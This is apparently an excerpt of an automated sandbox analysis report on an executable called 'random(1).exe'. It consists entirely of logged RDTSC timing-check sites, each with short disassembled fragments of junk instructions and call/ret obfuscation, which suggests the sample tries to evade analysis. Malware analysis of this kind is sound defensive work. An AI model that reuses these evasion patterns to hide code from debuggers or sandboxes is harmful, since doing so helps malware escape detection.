Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053D7F second address: 1053D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053D85 second address: 1053DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dh, ah 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007F06D8B4D9CEh 0x00000016 call 00007F06D8B4D9C9h 0x0000001b pushad 0x0000001c js 00007F06D8B4D9C8h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 jmp 00007F06D8B4D9CBh 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f jc 00007F06D8B4D9CAh 0x00000035 push ecx 0x00000036 push edx 0x00000037 pop edx 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d pushad 0x0000003e pushad 0x0000003f ja 00007F06D8B4D9C6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053DE5 second address: 1053DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053DEF second address: 1053E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F06D8B4D9CCh 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jng 00007F06D8B4D9C6h 0x00000020 pop esi 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107388F second address: 1073893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073893 second address: 1073897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073897 second address: 107389D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107389D second address: 1073904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D1h 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F06D8B4D9CEh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push edi 0x00000019 jmp 00007F06D8B4D9D6h 0x0000001e pop edi 0x0000001f jmp 00007F06D8B4D9CEh 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073A66 second address: 1073A7A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D851854Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073A7A second address: 1073AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073AAB second address: 1073AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073AAF second address: 1073AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C06 second address: 1073C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C0A second address: 1073C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C13 second address: 1073C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C1D second address: 1073C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C22 second address: 1073C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C28 second address: 1073C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073D8D second address: 1073D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073EBE second address: 1073ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a jnl 00007F06D8B4D9C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073ECE second address: 1073ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1074191 second address: 1074197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1074197 second address: 10741B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8518550h 0x0000000a push ecx 0x0000000b jnc 00007F06D8518546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10746F4 second address: 107471B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F06D8B4D9C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107471B second address: 107471F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10749AC second address: 10749C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F06D8B4D9CBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10749C1 second address: 10749C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10749C5 second address: 10749C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 106B72F second address: 106B74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 106B74C second address: 106B77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F06D8B4D9CAh 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 jne 00007F06D8B4D9C6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E5FE second address: 103E606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E606 second address: 103E60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E60C second address: 103E610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E610 second address: 103E62C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F06D8B4D9CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107503A second address: 1075044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1075044 second address: 107504A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107504A second address: 107504E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107578A second address: 107579D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107579D second address: 10757A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10757A1 second address: 10757A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107AED7 second address: 107AF03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518553h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107AF03 second address: 107AF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B2EE second address: 107B314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F06D8518550h 0x00000013 jmp 00007F06D851854Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B58B second address: 107B5B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B5B0 second address: 107B5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F06D8518546h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B5D6 second address: 107B5EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ecx 0x00000010 jo 00007F06D8B4D9CCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107F297 second address: 107F2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007F06D8518546h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107F2A4 second address: 107F2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F06D8B4D9CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1039674 second address: 1039689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F06D8518548h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103CB3E second address: 103CB55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F06D8B4D9C6h 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108346E second address: 1083495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F06D8518557h 0x0000000d ja 00007F06D8518552h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10835F9 second address: 10835FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10835FF second address: 1083605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083605 second address: 1083609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083609 second address: 1083612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083612 second address: 108361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083774 second address: 108378D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518555h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084580 second address: 1084585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084585 second address: 108458A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084686 second address: 1084692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084692 second address: 1084696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084696 second address: 108469F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084C72 second address: 1084C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D22 second address: 1084D2C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D2C second address: 1084D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F06D8518546h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F06D8518548h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D45 second address: 1084D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D4B second address: 1084D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D4F second address: 1084D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10851BC second address: 10851C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108524E second address: 1085253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085253 second address: 1085259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085259 second address: 10852B0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebx 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F06D8B4D9C8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call 00007F06D8B4D9CBh 0x0000002e push eax 0x0000002f sub di, 1E4Ah 0x00000034 pop esi 0x00000035 pop esi 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F06D8B4D9D1h 0x0000003f push eax 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10852B0 second address: 10852DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8518555h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10852DC second address: 10852E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085511 second address: 1085515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085515 second address: 108551B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10856AF second address: 10856B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10856B5 second address: 10856BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085803 second address: 108580D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1086DAE second address: 1086DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1087E35 second address: 1087EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F06D8518548h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007F06D851854Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F06D8518548h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 and edi, 62C285E4h 0x0000004d xchg eax, ebx 0x0000004e jmp 00007F06D851854Fh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jne 00007F06D8518546h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1088E3A second address: 1088EC8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F06D8B4D9E3h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e adc si, 1BB0h 0x00000033 push 00000000h 0x00000035 cld 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F06D8B4D9C8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 jp 00007F06D8B4D9D2h 0x00000059 js 00007F06D8B4D9CCh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1088670 second address: 1088675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1089860 second address: 10898E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F06D8B4D9C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D1E95h], esi 0x0000002d mov dword ptr [ebp+122D577Ah], eax 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 movzx eax, di 0x00000039 or ecx, dword ptr [ebp+122D2947h] 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F06D8B4D9C8h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c push edi 0x0000005d mov dword ptr [ebp+122D3799h], eax 0x00000063 pop edi 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jne 00007F06D8B4D9C6h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B2D2 second address: 108B2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B2DA second address: 108B2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
